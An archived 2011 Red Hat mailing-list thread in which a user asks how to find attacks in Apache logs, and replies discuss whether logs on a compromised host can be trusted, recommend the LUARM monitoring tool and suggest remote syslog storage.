Linux Archive

Linux Archive (http://www.linux-archive.org/)
-   Red Hat Linux (http://www.linux-archive.org/red-hat-linux/)
-   -   forensic Apache log analysis (http://www.linux-archive.org/red-hat-linux/557484-forensic-apache-log-analysis.html)

Georgios Magklaras 07-27-2011 09:33 AM

forensic Apache log analysis
 
On 07/27/2011 08:24 AM, ESGLinux wrote:

Hi All,

I have a problem with a RHEL server and I want to ask you for some advice.
Im not a security expert so I dont know which can be the best aproach to
solve my problem.

The problem is that I have several GigaBytes of Apache logs and I need to
look for attacks on it to check if the server has been compromised.

I can manually check some possible attack urls and looking for them on the
logs, but Im sure there must be tools or technics to do these in the
correct way.

So, any idea that can help me?

Thank you very much in advance,

ESG
The tools the others suggested are fine, however, normally, the culprit
with this approach is that you should not rely on the application logs
(experience often shows that logs that stay on the suspected compromised
system) might be tampered/compromised. This is contrary to the idea of
forensics, where you should have at a minimum something off the client
system to ensure some level of confidence in a post mortem examination.


In the future, please do take a look at LUARM:
http://luarm.sourceforge.net/ .

Make sure you get the latest version of it from svn by doing a:

svn co https://luarm.svn.sourceforge.net/svnroot/luarm luarm

and then follow the README for setup instructions. A case where I used
LUARM to detect a botnet compromised LAMP

is here:

http://epistolatory.blogspot.com/2011/02/catching-undesired-guest-in-penguin-tmp.html

Please do feel free to pass feedback.

GM

--
--
George Magklaras PhD
RHCE no: 805008309135525

Senior Systems Engineer/IT Manager
Biotek Center, University of Oslo
EMBnet TMPC Chair

http://folk.uio.no/georgios

Tel: +47 22840535

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list

ESGLinux 07-27-2011 09:46 AM

forensic Apache log analysis
 
hi,

This looks like interesting. As you say for my actual problem is not a
solution, but it is interesting to use in other systems.

My logs, I think, arent compromissed because they are not stored in the
same machine that is running Apache. So I thnk I can rely on them...

greetings and thanks for your help

ESG


2011/7/27 Georgios Magklaras <georgios@biotek.uio.no>

> On 07/27/2011 08:24 AM, ESGLinux wrote:
>
>> Hi All,
>>
>> I have a problem with a RHEL server and I want to ask you for some advice.
>> Im not a security expert so I dont know which can be the best aproach to
>> solve my problem.
>>
>> The problem is that I have several GigaBytes of Apache logs and I need to
>> look for attacks on it to check if the server has been compromised.
>>
>> I can manually check some possible attack urls and looking for them on the
>> logs, but Im sure there must be tools or technics to do these in the
>> correct way.
>>
>> So, any idea that can help me?
>>
>> Thank you very much in advance,
>>
>> ESG
>>
> The tools the others suggested are fine, however, normally, the culprit
> with this approach is that you should not rely on the application logs
> (experience often shows that logs that stay on the suspected compromised
> system) might be tampered/compromised. This is contrary to the idea of
> forensics, where you should have at a minimum something off the client
> system to ensure some level of confidence in a post mortem examination.
>
> In the future, please do take a look at LUARM:
> http://luarm.sourceforge.net/ .
> Make sure you get the latest version of it from svn by doing a:
>
> svn co https://luarm.svn.sourceforge.**net/svnroot/luarm<https://luarm.svn.sourceforge.net/svnroot/luarm>luarm
>
> and then follow the README for setup instructions. A case where I used
> LUARM to detect a botnet compromised LAMP
> is here:
>
> http://epistolatory.blogspot.**com/2011/02/catching-**
> undesired-guest-in-penguin-**tmp.html<http://epistolatory.blogspot.com/2011/02/catching-undesired-guest-in-penguin-tmp.html>
>
> Please do feel free to pass feedback.
>
> GM
>
> --
> --
> George Magklaras PhD
> RHCE no: 805008309135525
>
> Senior Systems Engineer/IT Manager
> Biotek Center, University of Oslo
> EMBnet TMPC Chair
>
> http://folk.uio.no/georgios
>
> Tel: +47 22840535
>
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request@**redhat.com<redhat-list-request@redhat.com>
> ?subject=unsubscribe
> https://www.redhat.com/**mailman/listinfo/redhat-list<https://www.redhat.com/mailman/listinfo/redhat-list>
>
--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list

Saqib Ilyas 07-27-2011 02:32 PM

forensic Apache log analysis
 
Attackers with reasonable experience tend to mess with the application and
system logs of the compromised machine. Goerge's point is that logs on a
compromised system (which you say in the second paragraph below, is your
case) are not to be taken as reliable. As an alternative, apache could store
logs on a different machine over, perhaps, syslog. That way, if the apache
machine is compromised, it does not necessarily mean that the log server is
also compromised, and hence the logs are more reliable.
But, of course, what he has suggested is for the future.

On Wed, Jul 27, 2011 at 2:46 PM, ESGLinux <esggrupos@gmail.com> wrote:

> hi,
>
> This looks like interesting. As you say for my actual problem is not a
> solution, but it is interesting to use in other systems.
>
> My logs, I think, arent compromissed because they are not stored in the
> same machine that is running Apache. So I thnk I can rely on them...
>
> greetings and thanks for your help
>
> ESG
>
>
> 2011/7/27 Georgios Magklaras <georgios@biotek.uio.no>
>
> > On 07/27/2011 08:24 AM, ESGLinux wrote:
> >
> >> Hi All,
> >>
> >> I have a problem with a RHEL server and I want to ask you for some
> advice.
> >> Im not a security expert so I dont know which can be the best aproach
> to
> >> solve my problem.
> >>
> >> The problem is that I have several GigaBytes of Apache logs and I need
> to
> >> look for attacks on it to check if the server has been compromised.
> >>
> >> I can manually check some possible attack urls and looking for them on
> the
> >> logs, but Im sure there must be tools or technics to do these in the
> >> correct way.
> >>
> >> So, any idea that can help me?
> >>
> >> Thank you very much in advance,
> >>
> >> ESG
> >>
> > The tools the others suggested are fine, however, normally, the culprit
> > with this approach is that you should not rely on the application logs
> > (experience often shows that logs that stay on the suspected compromised
> > system) might be tampered/compromised. This is contrary to the idea of
> > forensics, where you should have at a minimum something off the client
> > system to ensure some level of confidence in a post mortem examination.
> >
> > In the future, please do take a look at LUARM:
> > http://luarm.sourceforge.net/ .
> > Make sure you get the latest version of it from svn by doing a:
> >
> > svn co https://luarm.svn.sourceforge.**net/svnroot/luarm<
> https://luarm.svn.sourceforge.net/svnroot/luarm>luarm
> >
> > and then follow the README for setup instructions. A case where I used
> > LUARM to detect a botnet compromised LAMP
> > is here:
> >
> > http://epistolatory.blogspot.**com/2011/02/catching-**
> > undesired-guest-in-penguin-**tmp.html<
> http://epistolatory.blogspot.com/2011/02/catching-undesired-guest-in-penguin-tmp.html
> >
> >
> > Please do feel free to pass feedback.
> >
> > GM
> >
> > --
> > --
> > George Magklaras PhD
> > RHCE no: 805008309135525
> >
> > Senior Systems Engineer/IT Manager
> > Biotek Center, University of Oslo
> > EMBnet TMPC Chair
> >
> > http://folk.uio.no/georgios
> >
> > Tel: +47 22840535
> >
> > --
> > redhat-list mailing list
> > unsubscribe mailto:redhat-list-request@**redhat.com<
> redhat-list-request@redhat.com>
> > ?subject=unsubscribe
> > https://www.redhat.com/**mailman/listinfo/redhat-list<
> https://www.redhat.com/mailman/listinfo/redhat-list>
> >
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list
>



--
Muhammad Saqib Ilyas
PhD Student, Computer Science and Engineering
Lahore University of Management Sciences
--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list


All times are GMT. The time now is 05:42 AM.

VBulletin, Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO ©2007, Crawlability, Inc.